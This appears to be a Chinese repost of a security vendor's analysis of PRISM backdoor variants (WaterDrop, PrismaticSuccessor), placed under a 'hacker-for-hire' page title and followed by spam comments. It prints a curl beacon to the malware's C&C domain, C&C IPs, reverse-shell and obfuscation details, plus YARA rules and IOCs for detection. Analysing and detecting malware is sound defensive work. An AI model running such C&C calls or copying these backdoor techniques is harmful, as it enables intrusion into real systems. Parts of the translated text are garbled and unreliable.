黑客24小时在线接单的网站

黑客24小时在线接单的网站

潜伏四年,利用PRISM后门的攻击者

AT&T 安全研究人员最近发现了一组极具隐蔽性的 ELF 可执行文件,它们在 VirusTotal 上的杀软检出率很低或为零。样本分析后,AT&T 已将它们确定为多个攻击者在多次攻击行动中使用的开源 PRISM 后门修改版。

对使用这些恶意软件的攻击活动进行了深入分析,这些攻击者在三年半内仍然活跃。2017年 11 月 8 日出现了最早的攻击样本。

WaterDrop 分析

WaterDrop 的变种很容易识别,它包含一个名称 xencrypt该函数使用硬编码单字节 0x1F密钥执行异常或加密。WaterDrop 变种第 7 版开始,恶意样本还包含纯文本字符串 WaterDropx vX started,其中 X 是恶意样本的版本号。到目前为止,已经观察到版本 12.2 和 3 使用 PRISM 命名, 7、9 和 12 WaterDropx。

WaterDrop 使用 agent-waterdropx作为 User-Agent 进行 HTTP 协议的 C&C 通信,C&C 使用 waterdropx.com 域名子域名。

尽管这些都是非常明显的特征,但攻击者仍然保持在 VirusTotal 检出率极低,可能是因为攻击规模小。

攻击者于2017年8月18日注册 waterdropx.com 域名。截至2021年 8 月 10 日,该域名仍在使用。

除了 PRISM 除基本功能外,WaterDrop 还引入了额外的异常或加密和定期轮询 C&C 服务器功能。

恶意软件和 C&C 服务器的通信是纯文本 HTTP 协议,所有版本的恶意软件都使用 agent-waterdropx作为 User-Agent。

以 还会有一些变种root 执行权限时加载内核模块。

版本进化

(1) PRISM v1

第一个版本的样本是使用 waterdropx.com 作为 C&C 域名攻击者使用他们的 User-Agent 相同。

与公开的 PRISM 相比之下,该版本创建了子过程,子过程继续向 发展C&C 服务器轮询要执行的命令。

  • curl-A'agent-waterdropx''http://r.waterdropx.com:13858/tellmev2.x?v=1&act=touch'
  • 第一个版本的样本没有混淆、添加或加密恶意样本。

    (2) PRISM v2.2

    2.2 版本的 PRISM 开始处理敏感数据,如使用 shell 命令等。单字节密钥的硬编码是 0x1F,该密钥用于发现同一攻击者的所有样本。

    对于这个版本的恶意软件,初始的 C&C URI 请求格式如下:

  • /tellmev2.x?v=2.2&act=touch
  • (3) PRISM v3

    3 版本的 PRISM 与 2.2 版本基本相同,额外的 BOT ID 保存到 //etc/.xid。

    初始请求格式为:

  • /tellmev2.x?v=3&act=touch&xid=
  • (4) PRISM v7

    Waterdrop v7如果进程有 ,则引入了内核模块root 权限,使用 insmod 安装Payload 的用途。

    其余代码与 PRISM v3 是一样的,只改变了硬编码版本号。初始请求格式如下:

  • /tellmev2.x?v=7&act=touch&xid=
  • (5) PRISM v9

    延续之前版本的风格,Waterdrop v9 的变化很小。在这个版本中发现的唯一变化是使用 BOT ID 作为 ICMP 密码生成反向 Shell, 而不是使用硬编码 ICMP 密码。

    初始请求格式为:

  • /tellmev2.x?v=9&act=touch&xid=
  • (6) PRISM v12

    Waterdrop v12 几乎序版几乎相同,但增强了后门的稳定性。

    初始请求格式为:

  • /tellmev2.x?v=12&act=touch&xid=
  • 恶意软件家族 PrismaticSuccessor

    域名 z0gg.me 由另一个 12 域名共享IP 地址。

    已知重叠域名已知 PRISM 的 C&C 域名,但 z0gg.me 也与其他几个恶意样本有关。特别是观察到 https://github.com/lirongchun/i与仓库有关。

    以下文件可在本存储库中观察到:

    (1)三个包含 IP 地址(README.md)和端口号(README1.md 和 MP.md)的文档

    (2)针对脏牛(CVE-2016-5195)漏洞的 Bash 脚本叫:111

    (3)几个 ELF 二进制文件包括:

                     
    • git:定制恶意软件植入工具
    •                
    • ass:为 x64 架构编译的名称hide my ass开源安全工具
    •                
    • ass32:为 x86 架构编译的名称hide my ass开源安全工具

    攻击者使用公共 GIT 存储库托管恶意软件和基础设施信息观察其演变的历史数据。

    例如,我们可以使用以下命令收集参与者作为 C&C所有 服务器IP 地址:

  • $gitlog-pREADME.md|grep"^ "|grep-v"
  •    45.199.88[.]86
  •    154.48.227[.]27
  •    207.148.118[.]141
  •    154.48.227[.]27
  •    165.22.136[.]80
  •    154.48.227[.]27
  •    156.236.110[.]79
  •    43.230.11[.]125
  •    172.247.127[.]136
  •    127.0.0[.1]
  •    192.168.3[.]173
  •    192.168.3[.]173:80
  •    192.168.3[.]173
  •    118.107.180[.]8
  •    s.rammus[.]me
  •    s.rammus[.]me:80
  •    192.168.3[.]150:80
  •    192.168.3[.]150^80
  •    192.168.3[.]150^
  •    ^192.168.3[.]150
  •    ^192.168.3[.]133
  • $shasum-a256*
  • 933b4c6c48f82bbb62c9b1a430c7e758b88c03800c866b36c2da2a5f72c93657MP.out
  • f19043c7b06db60c8dd9ff55636f9d43b8b0145dffe4c6d33c14362619d10188git
  • eeabee866fd295652dd3ddbc7552a14953d91b455ebfed02d1ccdee6c855718dgit(1)
  • 3a4998bb2ea9f4cd2810643cb2c1dae290e4fe78e1d58582b6f49b232a58575agit(2)
  • 3366676681a31feadecfe7d0f5db61c4d6085f5081b2d464b6fe9b63750d4cd8git(3)
  • cc3752cc2cdd595bfed492a2f108932c5ac28110f5f0d30de8681bd10316b824git(4)
  • baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531git(5)
  • eb64ee2b6fc52c2c2211018875e30ae8e413e559bcced146af9aa84620e3312fgit443
  • d1d65b9d3711871d8f7ad1541cfbb7fa35ecc1df330699b75dd3c1403c754278git53
  • 77ddc6be62724ca57ff45003c5d855df5ff2b234190290545b064ee4e1145f63gitest
  • 1de9232f0bec9bd3932ae3a7a834c741c4c378a2350b4bbb491a102362235017hostname
  • 7ed15e59a094ca0f9ccac4c02865172ad67dcfc5335066f67fe3f11f68dd7473ps
  • 1eb6973f70075ede421bed604d7642fc844c5a47c53d0fb7a9ddb21b0bb2519awm
  • 6f983303bb82d8cc9e1ebf8c6c1eb7c17877debc66cd1ac7c9f78b24148a4e46wm(1)
  • e4fe57d9d2c78a097f38cba7a9aad7ca53da24ecbcad0c1e00f21d34d8a82de4wm32
  • b08d48cc12c6afa5821a069bd6895175d5db4b5a9dde4e04d587c3dec68b1920wmgithub
  • 按大小分组,可以发现 15K 样本为 PRISM 后门,大约 1.1 MB 样本是另一个恶意软件。

    攻击者在 2019 年 7 月 16 日提交了自定义 implant,恶意软件使用修改版 UPX 加壳。

    恶意软件明显变大是因为二进制文件静态编译成 libcurl,AT&T 把这个恶意软件家命名为 PrismaticSuccessor。

    分析可知,配置由两个 URL 组成:

                     
    • HostUrl 用于获取 C&C 主机
    •                
    • PortUrl 用于获取端口号

    执行后会尝试加锁 //var/lock/sshd.lock作为相互斥量。

    接下来,恶意软件解密包含过程名称的字符串,用于覆盖 argv。

    请注意,aMcwfkvf 变量包含 [mcwfkvf]值,值在 src解密为 [kauditd]。解密使用 ROT13,密钥为 -2。这个 ROT13 只处理大小字母,不处理符号和数字。

    接下来,恶意软件通过子过程进行多任务处理。

    一个子过程将打开一个硬代码C&C 服务器的反向 Shell 会话最多有三个配置C&C 地址(z0gg.me、x63.in 和 x47.in)并使用 ROT13 加密。

    服务器还需要使用密码进行回复,以便成功建立反向 Shell。恶意软件会计算回复缓冲区 MD5 哈希值和硬编码值 ef4a85e8fcba5b1dc95adaa256c5b482进行比较。

    无论主 C&C 服务器联系是否成功,将进行通信。

    通过 的子过程GitHub 获取 C&C 主机和端口打开反向 Shell。

    生成 Shell 函数与 PRISM 源代码非常相似,但不完全相同。

    跳转到 Shellcode 8 字节密钥, 异或解密,硬编码:

    施工命令如下:

    在 StackOverflow 还可以发现一些用户抱怨被攻击,这与之一致。

    其他变种

    我们也观察到其他攻击者使用 PRISM 攻击后门。然而,在大多数情况下,攻击者会使用原始 PRISM 后门没有任何重大修改。在某种程度上,这也阻碍了我们正确跟踪攻击者的攻击。

    结论

    PRISM 是一个开源简单的后门。其流量清晰可辨,恶意文件易于检测。C&C 服务器已经在线三年半了。这表明,尽管更受关注的大型攻击通常在几个小时内发现,但较小的攻击可能会被遗漏。

    检测方法

  • rulePrismaticSuccessor:LinuxMalware
  • {
  • meta:
  • author="AlienLabs"
  • description="PrismaticSuccessormalwarebackdoor"
  • reference="aaeee0e6f7623f0087144e6e318441352fef4000e7a8dd84b74907742c244ff5"
  • copyright="AlienvaultInc.2021"
  • strings:
  • $s1="echo-e\""
  • $s2="[\x1B[32m \x1B[0m]`/bin/hostname`"
  • $s3="[\x1B[32m \x1B[0m]`/usr/bin/id`"
  • $s4="[\x1B[32m \x1B[0m]`uname-r`"
  • $s5="[ ]HostUrl->\t%s\n"
  • $s6="[ ]PortUrl->\t%s\n"
  • $s7="/var/run/sshd.lock"
  • $shellcode={
  • 4831C9
  • 4881E9[4]
  • 488D05[4]
  • 48BB[8]
  • 4831[2]
  • 482D[2-4]
  • E2F4
  • }
  • $c1={
  • 8B45??
  • BE00000000
  • 89C7
  • E8[4]
  • 8B45??
  • BE01000000
  • 89C7
  • E8[4]
  • 8B45??
  • BE02000000
  • 89C7
  • E8[4]
  • 8B45??
  • BA[4]
  • BE[4]
  • 89C7
  • E8
  • }
  • condition:
  • uint32(0)==0x464C457Fand
  • filesize>500KBandfilesize<5MBand
  • 5of($s*)and
  • allof($c*)and
  • #shellcode==2
  • }
  • rulePRISM{
  • meta:
  • author="AlienLabs"
  • description="PRISMbackdoor"
  • reference="https://github.com/andreafabrizi/prism/blob/master/prism.c"
  • strings:
  • $s1="I'mnotroot:("
  • $s2="FlushIptables:\t"
  • $s3="Version:\t\t%s\n"
  • $s4="Shell:\t\t\t%s\n"
  • $s5="Processname:\t\t%s\n"
  • $s6="iptables-F2>/dev/null"
  • $s7="iptables-PINPUTACCEPT2>/dev/null"
  • $s8="started\n\n#"
  • $c1={
  • E8[4]8B45??BE0000000089C7E8[4]8B45??BE01000000
  • 89C7E8[4]8B45??BE0200000089C7E8[4]BA00000000
  • BE[4]BF[4]B800000000E8
  • }
  • $c2={
  • BA00000000
  • BE01000000
  • BF02000000
  • E8[4]
  • 8945[1]
  • 83????00
  • }
  • condition:
  • uint32(0)==0x464C457Fand
  • filesize<30KBand
  • (4of($s*)orallof($c*))
  • IOC

  • 05fc4dcce9e9e1e627ebf051a190bd1f73bc83d876c78c6b3d86fc97b0dfd8e8
  • 0af3e44967fb1b8e0f5026deb39852d4a13b117ee19986df5239f897914d9212
  • 0f42b737e30e35818bbf8bd6e58fae980445f297034d4e07a7e62a606d219af8
  • 0fba35856fadad942a59a90fc60784e6cceb1d8002af96d6cdf8e8c3533025f7
  • 342e7a720a738bf8dbd4e5689cad6ba6a4fc6dd6808512cb4eb294fb3ecf61cd
  • 3a3c701e282b7934017-dadc33d95e0cc57e43a124f14d852f39c2657e0081683
  • 5999c1a4a281a853378680f20f6133e53c7f6d0167445b968eb49b844f37eab5
  • 98fe5ed342da2b5a9d206e54b5234cfeeed35cf74b60d48eb0ef3dd1d7d7bd59
  • a8c68661d1632f3a55ff9b7294d7464cc2f3ece63a782c962f1dc43f0f968e33
  • af55b76d6c3c1f8368ddd3f9b40d1b6be50a2b97b25985d2dde1288ceab9ff24
  • b6844ca4d1d7c07ed349f839c861c940085f1a30bbc3fc4aad0b496e8d492ce0
  • b8215cafbea9c61df8835a3d52c40f9d2c6a37604dd329ef784e9d92bad1f30f
  • b8cceb317a5d2febcd60318c1652af61cd3d4062902820e79a9fb9a4717f7ba2
  • be7ec385e076c1c1f676d75e99148f05e754ef5b189e006fb53016ce9aef59e0
  • c679600b75c6e84b53f4e6e21f3acbec1621c38940c8f3756d0b027c7a058d9c
  • c802fa50409edf26e551ee0d134180aa1467a4923c759a2d3204948e14a52f12
  • c8525243a68cba92521fb80a73136aaa19794b4772c35d6ecfec0f82ecad5207
  • d3fa1155810be25f9b9a889ee64f845fc6645b2b839451b59cfa77bbc478531f
  • dd5f933598184426a626d261922e1e82cb009910c25447b174d46e9cac3d391a
  • e14d75ade6947141ac9b34f7f5743c14dbfb06f4dfb3089f82595d9b067e88c2
  • f126c4f8b4823954c3c69121b0632a0e2061ef13feb348eb81f634379d011913
  • 933b4c6c48f82bbb62c9b1a430c7e758b88c03800c866b36c2da2a5f72c93657
  • aaeee0e6f7623f0087144e6e318441352fef4000e7a8dd84b74907742c244ff5
  • baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531
  • f19043c7b06db60c8dd9ff55636f9d43b8b0145dffe4c6d33c14362619d10188
  • eeabee866fd295652dd3ddbc7552a14953d91b455ebfed02d1ccdee6c855718d
  • 3a4998bb2ea9f4cd2810643cb2c1dae290e4fe78e1d58582b6f49b232a58575a
  • 3366676681a31feadecfe7d0f5db61c4d6085f5081b2d464b6fe9b63750d4cd8
  • cc3752cc2cdd595bfed492a2f108932c5ac28110f5f0d30de8681bd10316b824
  • baf2fa00711120fa43df80b8a043ecc0ad26edd2c5d966007fcd3ffeb2820531
  • eb64ee2b6fc52c2c2211018875e30ae8e413e559bcced146af9aa84620e3312f
  • d1d65b9d3711871d8f7ad1541cfbb7fa35ecc1df330699b75dd3c1403c754278
  • 77ddc6be62724ca57ff45003c5d855df5ff2b234190290545b064ee4e1145f63
  • 1de9232f0bec9bd3932ae3a7a834c741c4c378a2350b4bbb491a102362235017
  • 7ed15e59a094ca0f9ccac4c02865172ad67dcfc5335066f67fe3f11f68dd7473
  • 1eb6973f70075ede421bed604d7642fc844c5a47c53d0fb7a9ddb21b0bb2519a
  • 6f983303bb82d8cc9e1ebf8c6c1eb7c17877debc66cd1ac7c9f78b24148a4e46
  • e4fe57d9d2c78a097f38cba7a9aad7ca53da24ecbcad0c1e00f21d34d8a82de4
  • b08d48cc12c6afa5821a069bd6895175d5db4b5a9dde4e04d587c3dec68b1920
  • 457467.com
  • zzz.457467.com
  • rammus.me
  • s.rammus.me
  • sw.rammus.me
  • wa1a1.com
  • www.wa1a1.com
  • waterdropx.com
  • r.waterdropx.com
  • spmood222.mooo.com
  • z0gg.me
  • x63.in
  • x47.in
  • 45.199.88.86
  •    
    • 评论列表:
    •  囤梦眼趣
       发布于 2022-06-08 19:14:36  回复该评论
    • 7a5d2febcd60318c1652af61cd3d4062902820e79a9fb9a4717f7ba2be7ec385e076c1c1f676d75e99148f05e754ef5b189e006fb53016ce9aef59e0c679600b75c6e84b53f4e
    •  孤央邶谌
       发布于 2022-06-08 20:04:29  回复该评论
    • 784e6cceb1d8002af96d6cdf8e8c3533025f7342e7a720a738bf8dbd4e5689cad6ba6a4fc6dd6808512cb4eb294fb3ecf61cd3a3c701e282b7934017-dadc33d95e0cc5
    •  舔夺奢欲
       发布于 2022-06-08 17:24:09  回复该评论
    • 。对使用这些恶意软件的攻击活动进行了深入分析,这些攻击者在三年半内仍然活跃。2017年 11 月 8 日出现了最早的攻击样本。WaterDrop 分析WaterDrop 的变种很容易识别,它包含一个名称 xencrypt该函数使用硬编码单字
    •  绿邪纯乏
       发布于 2022-06-09 02:04:38  回复该评论
    • 5    172.247.127[.]136    127.0.0[.1]    192.168.3[.]173    192.168.3[.]173:80    192.168.3[.]173
    •  北槐乙白
       发布于 2022-06-09 01:23:52  回复该评论
    • ;C 使用 waterdropx.com 域名子域名。尽管这些都是非常明显的特征,但攻击者仍然保持在 VirusTotal 检出率极低,可能是因为攻击规模小。攻击者于2017年8月18日注册 waterdropx.com 域名

    发表评论:

    Powered By

    Copyright Your WebSite.Some Rights Reserved.